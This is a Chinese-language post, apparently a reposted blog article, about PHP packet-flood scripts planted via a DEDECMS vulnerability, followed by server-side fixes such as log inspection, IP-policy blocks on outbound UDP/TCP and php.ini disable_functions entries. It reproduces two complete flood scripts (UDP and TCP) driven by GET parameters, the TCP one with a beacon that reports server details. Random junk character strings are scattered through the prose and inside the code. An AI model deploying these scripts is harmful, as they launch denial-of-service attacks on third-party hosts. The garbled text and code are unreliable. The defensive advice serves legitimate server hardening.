服务器php对外发包引起崩溃的解决办法paopao最近老听人说,php对外发包,引起服务器崩溃或被机房查封,今天闲着无事和大家一起分享paopao我总结的DEDECMS php对外发包引发服务器崩溃的终极解决方法,希望可以帮助大家解决服务器问题,让网站运行的更好8 G5 c: r2 F; x- ` g: }
一。php对外发包分析
8 m( [5 U: g( a: a- I/ r1 f 用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
' e' n$ k) V m" d/ Q9 t 以下是代码片段:
( [& k% [% ^- h9 m1 U h $packets = 0;# S; _$ H, F: J- q
$ip = $_GET[\'ip\'];
9 [+ ]# H5 H/ Z: `) R5 H $rand = $_GET[\'port\'];
+ K; p* L* F. V* i set_time_limit(0);
$ U# Z! L! a4 `4 j$ s ignore_user_abort(FALSE);: K* m c+ v! _
$exec_time = $_GET[\'time\'];sbxl-201206126 V+ h# L% g4 {" Q+ i; L( N
$time = time();9 s+ M4 t+ n7 u. V5 R+ U
print \'Flooded: $ip on port $rand( t% P; S6 g9 O- @* A6 k
\';
- _2 F1 j; f, i# g; K( y/ J $max_time = $time+$exec_time;$ z, z0 M! y% _
for($i=0;$i<65535;$i++){
+ e3 h- [6 B# {: {! | $out .= \'X\';! j! j! D7 F i0 t- R/ F
}
2 }, C3 ?! g, y; a while(1){
3 j7 `! }( M5 D1 ?4 D- D9 u2 }" y $packets++;
3 O- D. T# } B& b1 E: I if(time() > $max_time){
/ X5 U0 y; E" S7 u/ U break; u/ }% r5 h8 R) ?. x3 ]* O
}, x+ M, V5 y+ ?- L& b
$fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);, I& R5 _2 c8 E
if($fp){/ @* N7 ]1 L! N1 c+ z# Y) X
fwrite($fp, $out);
: N; D2 R9 a7 V! I; ^ fclose($fp);
3 ^. {" `! h- K% j0 a2 y }
0 h& u& C% c! B& M1 j0 b9 I: N( F }% C0 d2 B9 q( m/ S/ G, Q
echo \'Packet complete at \'.time(\'h:i:s\').\' with3 F/ E' r( }" m9 U( q( k# m
$packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'.
, w$ R" [, [0 A( a* y' v; p round($packets/$exec_time, 2) . \' packets/s ;. e1 u0 x) ?1 T* ~
?>
& P* @/ w+ f9 f 二。表现特征
' d, d8 Z' l: M& J2 | 一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包.
# I1 w6 g: q8 `" W( y: L5 M 近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.5 i7 F1 i5 q/ ]' M
如何快速找到这些站?5 J, L. v" ~/ x) i* q
你可以打开日志
9 \6 N* q4 u: z3 v0 ? C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,0 H j2 D4 M$ z! l; D* Z$ Q( Y: X7 {* D# \7 E
里面有类似这样的记录:( K: h- n/ ~5 g' B# {2 }; l+ z
2012-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_18 P. o, {; M4 g. o
最后三项783 Disabled 30_FreeHost_1
! f, p9 M8 D" a0 q% B6 Q, P 783就是这个站在IIS中的ID% H) Q( ~5 @5 P* G# p, a
30_FreeHost_1就是所在池
9 g; Y' p/ y% ^# S 三?解决办法
2 J8 u1 C& P( r8 D! c9 {& i: W 1.按上述找到这个网站后停止它.或停止池,并重启IIS.
% Q8 S! d6 M3 p 2.在IP策略,或防火墙中,禁止所有udp向外发送) h8 `# } | R
在星外最新版本的安全包中,已带有4.0版本的IP策略【下载safe包】,您导入后就直接可以限制了外发的UDP包?下载这个包,之后导入安全策略?但这个策略并没有关闭DNS端口,部分攻击还是有效.
' z9 r6 E7 O. V7 D+ H# j, q 为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址'特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了)
* [9 y8 C8 w6 y 在2011-4-27,我们上传了新的安全包,里面有一个'星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec'文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常)
u6 C4 L% _7 H- B2 W/ z 3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.) Z" q2 b! k+ t# K
4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
} d: G, V$ X ignore_user_abort = On
( X5 @$ D% w& r (注意前面的;号要删除)% g9 [& G! z) p+ H# V$ P5 n
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,/ W+ `0 W; n& d/ W
在后面加上
3 ^6 w9 G( T; w" @) x# J6 t/ _; g& m4 ~% @ fsockopen,set_time_limit1 s0 D5 o! {4 F+ n; S* F
但这样会造成很多php程序都不正常.
/ ^% o# x# y" s+ f 另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?# I/ L- l0 I" E; Q9 `7 {& L
近期已有新的基于TCP攻击的PHPDDOS代码如下:
* Y4 u& O, A, `( k1 y8 W f 以下是代码片段:( f8 K; Z: p! X o# N) c) d
set_time_limit(999999);# }( _2 _) \; M8 A8 ~6 ]
$host = $_GET['host'];
& h7 ?7 }! V5 B0 A, Z. k $port = $_GET['port'];: t3 B) h* `% `/ A" g" K
$exec_time = $_GET['time'];9 R- ~" ^# a5 Y
$packets = 64;6 ^1 W0 T2 d4 D9 D7 \" j1 i' |
ignore_user_abort(True);
6 P( r g, z1 H) @ `* y if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
4 Y/ W2 g1 d3 b' { if (StrLen($_GET['rat'])<>0){/ v& [% U* ]1 [4 h' \" O# d) E
echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.7 e2 w5 N& L8 R
php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
" W4 R7 g0 s/ c7 z! M2 v exit;' t4 d. Y; [) W
}
% Y+ `; l" s9 T1 P exit;
: x" K- `; T* m7 X, _! r* v }
" R/ e; T1 @) O- g, M! y $max_time = time()+$exec_time;
' Q; H7 v, `, y- E$ j while(1){
8 @$ h3 Z" b* V+ C" X" x, O0 I, |& q; ]; B $packets++;
6 V9 v/ ~' ]" w3 @) F if(time() > $max_time or $exec_time != 69){* @6 a ~' N6 t7 ~; k- o8 p
break;1 \) L# o% U0 `! \- b) J5 Z1 R
}+ F0 W9 h' h8 g5 ^6 _) z
$fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);
2 I. F% x4 c3 M1 O. ]1 S. Y }, d$ M# J$ c* g
?>
7 |' N7 { Y# l& V 同样,可以采有以下解决办法:
2 v$ ]+ Y: B4 D+ X& w: P 1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS* u$ H2 F' \) F: t2 M$ t6 K& x
ignore_user_abort = On
; p+ d# \. B, V* n8 [; M0 V (注意前面的;号要删除)$ c/ d4 z8 N: L: ?) ]. Z4 I& t
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
$ X. M% m! z# D" t" C 在后面加上
( k# G, S7 T: z6 W, ?5 y5 c8 g fsockopen,set_time_limit5 @5 r$ Z1 y+ F O4 h4 S7 L* g9 R
但这样会造成很多php程序都不正常. 如果您是IDC,给客户提供空间的,禁用函数可能导致客户程序无法运行,所以一般不要用此办法 u) x! y+ f; h. [* Z5 j
2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上?
+ w- T/ [' _, B: ^* o* D 3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它?6 a+ p0 O; f" O: F7 C" @0 C
文章出自医院网站优化 http://www.ahyyqing.com,转载请注明出处。
- p! \; x' @7 v0 I |